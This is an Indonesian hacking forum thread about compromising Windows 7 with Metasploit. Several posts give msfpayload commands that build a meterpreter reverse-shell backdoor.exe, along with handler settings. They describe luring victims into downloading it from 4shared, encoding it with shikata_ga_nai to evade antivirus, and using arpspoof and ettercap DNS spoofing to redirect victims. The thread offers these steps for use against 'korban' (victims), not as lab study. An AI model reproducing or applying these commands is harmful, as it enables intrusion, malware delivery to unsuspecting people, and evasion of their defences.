Metasploit windows 7
#11
mulainya darimana ya ini Sad
gak paham ...
tapi pengen sekali bisa!!!

#12
om bgusnya pke payload ap???
soalx ku pke payload windows/shell/bind_tcp, ngak bisa jalan itu om, mohon pencerahannya om Big Grin


#13
misi om mau tanya...
ane udah bs dapet shell dr windows 7(virtualbox) tp wktu diupgrade koq error y?
ada solusi g om2?
ane udah buntu nih nyari di google...

thanks Big Grin

#14
(10-06-2012, 02:07 PM)dvil Wrote: Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

maap kalo salah
sekdar ikut bantu aja Smile

msfpayload windows/meterpreter/reverse_tcp LHOST=”IP anda Bro” LPORT=”Listen Port” x > /root/backdoor.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IPanda
set lport 4444
exploit




#15
(12-07-2012, 08:31 PM)cr00s1d3 Wrote:
(10-06-2012, 02:07 PM)dvil Wrote: Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

maap kalo salah
sekdar ikut bantu aja Smile

msfpayload windows/meterpreter/reverse_tcp LHOST=”IP anda Bro” LPORT=”Listen Port” x > /root/backdoor.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IPanda
set lport 4444
exploit
Nah cara yang di atas ane nih mantep, ane tambahin dikit nih ya. ??
sekarang gimana cara "backdoor.exe" itu di eksekusi oleh si korban. Kalo udah di eksekusi, nah sekarang tinggal nunggu stage meterpreternya muncul dah.
kalo ane sih lebih asiknya begini: bkin backdoor (seperti cara diatas "msfpayload windows/meterpreter/reverse_tcp lhost=ipkita lport=portlistenkita(4444) x > /root/backdoor.exe"
Nah udah jadi backdoor.exe nya, copy file backdoor.exe terus upload dah di4shared, atau di web download yang laennya. nah, jalani msfconsole seperti yang diatas perintahnya. Dan sekarang arahin dah link dimana backdoor.exe bisa didownload ama si korban. dan tunggu hasilnya Smile ...

Quote:~ Tan Hana Wighna Tan Sirna ~

#16
(12-08-2012, 10:54 AM)gnome_selpa Wrote:
(12-07-2012, 08:31 PM)cr00s1d3 Wrote:
(10-06-2012, 02:07 PM)dvil Wrote: Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

maap kalo salah
sekdar ikut bantu aja Smile

msfpayload windows/meterpreter/reverse_tcp LHOST=”IP anda Bro” LPORT=”Listen Port” x > /root/backdoor.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IPanda
set lport 4444
exploit
Nah cara yang di atas ane nih mantep, ane tambahin dikit nih ya. ??
sekarang gimana cara "backdoor.exe" itu di eksekusi oleh si korban. Kalo udah di eksekusi, nah sekarang tinggal nunggu stage meterpreternya muncul dah.
kalo ane sih lebih asiknya begini: bkin backdoor (seperti cara diatas "msfpayload windows/meterpreter/reverse_tcp lhost=ipkita lport=portlistenkita(4444) x > /root/backdoor.exe"
Nah udah jadi backdoor.exe nya, copy file backdoor.exe terus upload dah di4shared, atau di web download yang laennya. nah, jalani msfconsole seperti yang diatas perintahnya. Dan sekarang arahin dah link dimana backdoor.exe bisa didownload ama si korban. dan tunggu hasilnya Smile ...

Emang 4shared membolehkan file exe di upload ?

KENDALA UTAMA : tetap di Antivirus dan Firewall.
Countermeasure Kendala UTAMA : Social Engineering Big Grin

#17
(12-08-2012, 05:05 PM)czeroo_cool Wrote: Emang 4shared membolehkan file exe di upload ?

KENDALA UTAMA : tetap di Antivirus dan Firewall.
Countermeasure Kendala UTAMA : Social Engineering Big Grin

ia sih kaykny msalah utama tetap di AV,,
tu file blum di jlankan ja udah ke hapus ama AV,, Big Grin

mungkin ada yg bisa kasih pencerahan Big Grin


#18
coba liat sedikit dech kalau berkenan... tapi kalau bisa dengerin lagunya aja ya Smile


#19
(12-15-2012, 01:39 AM)cr00s1d3 Wrote:
(12-08-2012, 05:05 PM)czeroo_cool Wrote: Emang 4shared membolehkan file exe di upload ?

KENDALA UTAMA : tetap di Antivirus dan Firewall.
Countermeasure Kendala UTAMA : Social Engineering Big Grin

ia sih kaykny msalah utama tetap di AV,,
tu file blum di jlankan ja udah ke hapus ama AV,, Big Grin

mungkin ada yg bisa kasih pencerahan Big Grin

di encode dulu bro biar ga ke detect virus di 4shared

msfpayload windows/meterpreter/reverse_tcp LHOST=ip_attacker LPORT=port_attacker R | msfencode -e x86/shikata_ga_nai -c 5 -t exe >> /direktori_file_backdoor.exe

atau ga usah di 4shared.
tinggal buka menu backtrack > services > HTTPD > apache start .

biar lebih bagus lagi kalo ip victim nya udah ketauan di
arpspoof -i (interface network;eth0 atau wlan0) -t ip_victim ip_router
terus pake ettercap buat spoof dns ke ip kita .

CMIIW Smile:-

[/quote]

di encode dulu bro biar ga ke detect virus di 4shared

msfpayload windows/meterpreter/reverse_tcp LHOST=ip_attacker LPORT=port_attacker R | msfencode -e x86/shikata_ga_nai -c 5 -t exe >> /direktori_file_backdoor.exe

atau ga usah di 4shared.
tinggal buka menu backtrack > services > HTTPD > apache start .

biar lebih bagus lagi kalo ip victim nya udah ketauan di
arpspoof -i (interface network;eth0 atau wlan0) -t ip_victim ip_router
terus pake ettercap buat spoof dns ke ip kita .

CMIIW Smile:-
[/quote]

#20
kagak ada work 100%.
kak zee tolong dong di kelari masalah ini Big Grin





Users browsing this thread: 1 Guest(s)